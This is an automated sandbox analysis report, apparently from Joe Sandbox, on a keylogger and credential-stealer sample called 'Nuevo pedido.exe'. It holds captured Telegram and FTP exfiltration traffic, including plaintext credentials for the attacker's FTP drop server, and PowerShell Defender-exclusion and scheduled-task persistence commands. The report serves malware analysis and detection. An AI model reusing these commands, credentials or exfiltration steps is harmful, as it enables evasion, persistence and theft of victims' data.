States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49775	149.154.167.220	443	8116	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 15:36:17 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2009/01/2025%20/%2020:42:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-09 15:36:17 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 15:36:17 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-09 15:36:17 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 9, 2025 16:36:27.697698116 CET	21	49778	50.31.176.103	192.168.2.4	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 500 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 500 allowed.220-Local time is now 10:36. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 500 allowed.220-Local time is now 10:36. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 500 allowed.220-Local time is now 10:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 500 allowed.220-Local time is now 10:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Jan 9, 2025 16:36:27.697879076 CET	49778	21	192.168.2.4	50.31.176.103	USER somavip@gdmaduanas.com
Jan 9, 2025 16:36:27.816128969 CET	21	49778	50.31.176.103	192.168.2.4	331 User somavip@gdmaduanas.com OK. Password required
Jan 9, 2025 16:36:27.816339016 CET	49778	21	192.168.2.4	50.31.176.103	PASS 6JLyf]Kt%D5L
Jan 9, 2025 16:36:28.082225084 CET	21	49778	50.31.176.103	192.168.2.4	230 OK. Current restricted directory is /
Jan 9, 2025 16:36:28.200855017 CET	21	49778	50.31.176.103	192.168.2.4	504 Unknown command
Jan 9, 2025 16:36:28.206984043 CET	49778	21	192.168.2.4	50.31.176.103	PWD
Jan 9, 2025 16:36:28.325298071 CET	21	49778	50.31.176.103	192.168.2.4	257 "/" is your current location
Jan 9, 2025 16:36:28.326448917 CET	49778	21	192.168.2.4	50.31.176.103	TYPE I
Jan 9, 2025 16:36:28.444933891 CET	21	49778	50.31.176.103	192.168.2.4	200 TYPE is now 8-bit binary
Jan 9, 2025 16:36:28.445205927 CET	49778	21	192.168.2.4	50.31.176.103	PASV
Jan 9, 2025 16:36:28.563643932 CET	21	49778	50.31.176.103	192.168.2.4	227 Entering Passive Mode (50,31,176,103,125,59)
Jan 9, 2025 16:36:28.577986956 CET	49778	21	192.168.2.4	50.31.176.103	STOR 494126 - Cookies ID - ZyiAEnXWZP669604277.txt
Jan 9, 2025 16:36:28.984383106 CET	21	49778	50.31.176.103	192.168.2.4	150 Accepted data connection
Jan 9, 2025 16:36:29.113235950 CET	21	49778	50.31.176.103	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.119 seconds (measured here), 55.85 Kbytes per second

Target ID:	0
Start time:	10:35:56
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\Nuevo pedido.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Nuevo pedido.exe"
Imagebase:	0x470000
File size:	754'176 bytes
MD5 hash:	B19A7098F74CE79004FFD6A109302EF0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:35:59
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe"
Imagebase:	0x8a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:35:59
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:35:59
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe"
Imagebase:	0x8a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:35:59
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:35:59
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp"
Imagebase:	0x6a0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:35:59
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:35:59
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\Nuevo pedido.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Nuevo pedido.exe"
Imagebase:	0x320000
File size:	754'176 bytes
MD5 hash:	B19A7098F74CE79004FFD6A109302EF0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:35:59
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\Nuevo pedido.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Nuevo pedido.exe"
Imagebase:	0xd30000
File size:	754'176 bytes
MD5 hash:	B19A7098F74CE79004FFD6A109302EF0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	10:36:01
Start date:	09/01/2025
Path:	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
Imagebase:	0xcf0000
File size:	754'176 bytes
MD5 hash:	B19A7098F74CE79004FFD6A109302EF0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 45%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:36:02
Start date:	09/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:36:04
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp69D7.tmp"
Imagebase:	0x6a0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:36:04
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:36:04
Start date:	09/01/2025
Path:	C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe"
Imagebase:	0xec0000
File size:	754'176 bytes
MD5 hash:	B19A7098F74CE79004FFD6A109302EF0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.4135978280.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	230
Total number of Limit Nodes:	17

Executed Functions

Function 06F30D8A Relevance: 4.1, Strings: 3, Instructions: 388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0%p1, xrefs: 06F31090
0%p1, xrefs: 06F310A7
0%p1, xrefs: 06F31089

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: 0%p1$0%p1$0%p1
API String ID: 0-1740658550
Opcode ID: 90dbb7a3f7c4b15295c1903c4ab932481583d57c8606cc90e0bf6b19c7183411
Instruction ID: dc6734e19a17b787526db3629f1590b0463e675b17d6cb69d2dbb095ab7859e3
Opcode Fuzzy Hash: 90dbb7a3f7c4b15295c1903c4ab932481583d57c8606cc90e0bf6b19c7183411
Instruction Fuzzy Hash: 1BE1CF75E01216DFCB44CFA9D8818AFFBB6FF89340B10855AE401AB214DB349A42CFE5

Function 06F30E10 Relevance: 4.1, Strings: 3, Instructions: 379
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0%p1, xrefs: 06F31090
0%p1, xrefs: 06F310A7
0%p1, xrefs: 06F31089

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: 0%p1$0%p1$0%p1
API String ID: 0-1740658550
Opcode ID: 71b0e2076394b2446aa3657779dfbaf3c303ebb7b590f31cda6d42c75e99373c
Instruction ID: e623d506ef01951fee4ebe600026c62b2579145df41330583613443874a194eb
Opcode Fuzzy Hash: 71b0e2076394b2446aa3657779dfbaf3c303ebb7b590f31cda6d42c75e99373c
Instruction Fuzzy Hash: 07E19E75D0121ADFCB44CFA9D8818AFFBB6FF89340B10955AE401AB254DB349A42CFE5

Function 06F30F00 Relevance: 4.0, Strings: 3, Instructions: 278
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0%p1, xrefs: 06F31090
0%p1, xrefs: 06F310A7
0%p1, xrefs: 06F31089

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: 0%p1$0%p1$0%p1
API String ID: 0-1740658550
Opcode ID: 6d81c37e55e274b4a60b91b8d32ee8c9bb20365c31f192cca6a5343e02535076
Instruction ID: 7ef5899ad56fc8e4a96b9b1aee058014c1f7fb82fb75872ebeb3adbc8248068f
Opcode Fuzzy Hash: 6d81c37e55e274b4a60b91b8d32ee8c9bb20365c31f192cca6a5343e02535076
Instruction Fuzzy Hash: 75C17D75E0421ACFCB44CFA9D5818AEFBB2FF89340B14D55AE405AB354DB34A982CF94

Function 06F34548 Relevance: 1.5, Strings: 1, Instructions: 243COMMON

Download Yara Rule

Strings

7{f', xrefs: 06F347A4

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: 7{f'
API String ID: 0-2192695807
Opcode ID: 2c93380a0bd0ecc19c2937e67079b34a684345199a1a05c05150446d9501bfec
Instruction ID: 516387221121860421703be38391568bb7bc7404b021b02d59c672da55b029f3
Opcode Fuzzy Hash: 2c93380a0bd0ecc19c2937e67079b34a684345199a1a05c05150446d9501bfec
Instruction Fuzzy Hash: 03A11771E1A219DFDB84CFA5DA8499DFBF2EF8A300F20A41AD406BB254D73499058F54

Function 06F34538 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

7{f', xrefs: 06F347A4

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: 7{f'
API String ID: 0-2192695807
Opcode ID: fc143e1273f491cb9384ca19229691b5011571029498816ab6bb76cdffe3f417
Instruction ID: a2be8ad98b7ce9d1c52c59e6c0105866a534630945d69177dc5ae9acefc4985e
Opcode Fuzzy Hash: fc143e1273f491cb9384ca19229691b5011571029498816ab6bb76cdffe3f417
Instruction Fuzzy Hash: 31A13871E16219DFDB44CFA5DA8499DFBF2EF89300F20A42AE406BB254D7349905CF54

Function 06F34210 Relevance: 1.5, Strings: 1, Instructions: 212COMMON

Download Yara Rule

Strings

Z, xrefs: 06F343C2

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: Z
API String ID: 0-1862792848
Opcode ID: 8daaf255de42c1068865163ea29ba7da4b752bb92bcc0987722ddd2a10eca548
Instruction ID: bfa7b390ab879922a8116cf833ea6bf04d5961da52209fb58d91624702be562c
Opcode Fuzzy Hash: 8daaf255de42c1068865163ea29ba7da4b752bb92bcc0987722ddd2a10eca548
Instruction Fuzzy Hash: 4A913775E00229CFDB44CFA9D9409EEFBB2FF88200F10956AD825B7258D7359902CF98

Function 06F34201 Relevance: 1.5, Strings: 1, Instructions: 207COMMON

Download Yara Rule

Strings

Z, xrefs: 06F343C2

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: Z
API String ID: 0-1862792848
Opcode ID: 108b6b4a366ba0dd92255ec21e47645d761e0e80c200cec0c3bca91bffe7c9b0
Instruction ID: bdcc4e5f635bf896cc09dfa4980d4ce046afebf09bbb8a59b5a6bc431693b07c
Opcode Fuzzy Hash: 108b6b4a366ba0dd92255ec21e47645d761e0e80c200cec0c3bca91bffe7c9b0
Instruction Fuzzy Hash: 3A813575E01229CFDB44CFA9D9849EEFBB2FF88200F10956AD825B7258D7359902CF94

Function 06F33698 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d51fe4a5315ef055c2c36ce3f6896e3d75ac8a4073939ea2b0e86c29343bc254
Instruction ID: b0594aa60ecdcf1ce23966c029cc9af6c8575ad5bc35b7a1d511f20af7ecb134
Opcode Fuzzy Hash: d51fe4a5315ef055c2c36ce3f6896e3d75ac8a4073939ea2b0e86c29343bc254
Instruction Fuzzy Hash: 2441D175E10608EFD748CFAAE58489DFBF2FF89200F59D0A5D458AB365EB319A118B04

Function 06F3368B Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 882b4c4d59c308d24b8f8e0ac57317a42d9338d59caed8472aa87725aaa73e2b
Instruction ID: b8eb4ba425b5eca77223fa8182ede942f1e69ad5ef2367770c0843354028756a
Opcode Fuzzy Hash: 882b4c4d59c308d24b8f8e0ac57317a42d9338d59caed8472aa87725aaa73e2b
Instruction Fuzzy Hash: 7C41D275E10508EFD748CFAAE58499DFBF2FF89200F19D0A9D458AB365EB319A118B04

Function 06F30006 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a191a2e6d12a9916da9fa5d26cd5be77d53d434453bb78c790fff709ef1d64f2
Instruction ID: 0599a985cd0bf35144d769a8597f6782bc29b571761e02cb7384a81ca45d7ba8
Opcode Fuzzy Hash: a191a2e6d12a9916da9fa5d26cd5be77d53d434453bb78c790fff709ef1d64f2
Instruction Fuzzy Hash: 22316DB1D057988FDB59CFA6C8443DABFB3AF86300F18C0AAD404AB265DB340945CB60

Function 06F30040 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad4b97f3abb632e18b7a340ea79e5d523029110b094ba0999ea4cb42c92aa002
Instruction ID: 54f63b7652d92a5886d053567f51791c426046a35633d85f79300ea13c8f1aa3
Opcode Fuzzy Hash: ad4b97f3abb632e18b7a340ea79e5d523029110b094ba0999ea4cb42c92aa002
Instruction Fuzzy Hash: 662118B1E006189BDB58CFABD8442DEFBF3AFC8310F14C16AD408A6268DB741A45CF50

Function 02673DC0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ba7ed809b98d1f50345e943c1bdc8293f67f23c48b737aa12cfcfd2ffcd56e5
Instruction ID: 32c6ba11bd9bf2c626125082d11a05f2aed64ad296452d0c9147683a55b0346e
Opcode Fuzzy Hash: 5ba7ed809b98d1f50345e943c1bdc8293f67f23c48b737aa12cfcfd2ffcd56e5
Instruction Fuzzy Hash: 2FD01274C0E104CFD304DF64A5585F876B89B07241F1820DA510E97202D5704842CE15

Function 026745F9 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6ab17784f342a1830836d078ce509cac20b790a6fa4d6082b813d95bfc164d2
Instruction ID: c51b115a1d3a147b62befec1149c103ad586f08f2a6d7af55b94b9abc6752bcc
Opcode Fuzzy Hash: a6ab17784f342a1830836d078ce509cac20b790a6fa4d6082b813d95bfc164d2
Instruction Fuzzy Hash: 5BA00200C8E405C09608EE1031440B9F17D460B281E203989900E332020C10C053E81D

Function 0275D031 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0275D0BE
GetCurrentThread.KERNEL32 ref: 0275D0FB
GetCurrentProcess.KERNEL32 ref: 0275D138
GetCurrentThreadId.KERNEL32 ref: 0275D191

Memory Dump Source

Source File: 00000000.00000002.1729322384.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2750000_Nuevo pedido.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 73ee7ee62c01c85d78778ca26c955edcf85fb7261090945eeba0a67c40914fb8
Instruction ID: b954724418a232ca924a50b2892d09bb1a9a94a47743dec9c60a435c0366fbc1
Opcode Fuzzy Hash: 73ee7ee62c01c85d78778ca26c955edcf85fb7261090945eeba0a67c40914fb8
Instruction Fuzzy Hash: 775166B49002498FDB14DFA9D548BDEFBF1EF88308F208469E419A7360DB75A944CF66

Function 0275D040 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0275D0BE
GetCurrentThread.KERNEL32 ref: 0275D0FB
GetCurrentProcess.KERNEL32 ref: 0275D138
GetCurrentThreadId.KERNEL32 ref: 0275D191

Memory Dump Source

Source File: 00000000.00000002.1729322384.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2750000_Nuevo pedido.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: cf4c8b780915d3ed06b31c6e539b163e5e3563ca2dc3b77765f3409d5340121e
Instruction ID: 9a838f07e009cfa28a7f54570c5d460c0fd5942c9949ca75a23e01a915cfc3ea
Opcode Fuzzy Hash: cf4c8b780915d3ed06b31c6e539b163e5e3563ca2dc3b77765f3409d5340121e
Instruction Fuzzy Hash: F35146B49002498FDB14DFAAD548BDEFBF1EF88304F208469E419A7360DB75A984CF65

Function 0275ADA8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0275AFFE

Strings

(W, xrefs: 0275AF36
(W, xrefs: 0275AF5B

Memory Dump Source

Source File: 00000000.00000002.1729322384.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2750000_Nuevo pedido.jbxd

Similarity

API ID: HandleModule
String ID: (W$(W
API String ID: 4139908857-3901626427
Opcode ID: 72c0d045c1245d989017cc760b1362c366cb1899c793af3b0202d17877b4a449
Instruction ID: 5c842cfc8875afc6b9a544e9f92aaed07e9e0faa7b882fc8cdc12fcc99fcf99d
Opcode Fuzzy Hash: 72c0d045c1245d989017cc760b1362c366cb1899c793af3b0202d17877b4a449
Instruction Fuzzy Hash: 9E711470A00B158FD724DF29D45579ABBF1FF88304F008A2DD88A97A50DBB5E949CB91

Function 02670CC4 Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02670F06

Memory Dump Source

Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0174f0a15ac47d22ea9386c8bb0c35b2568bfaca640bd6ed91308d8777e74008
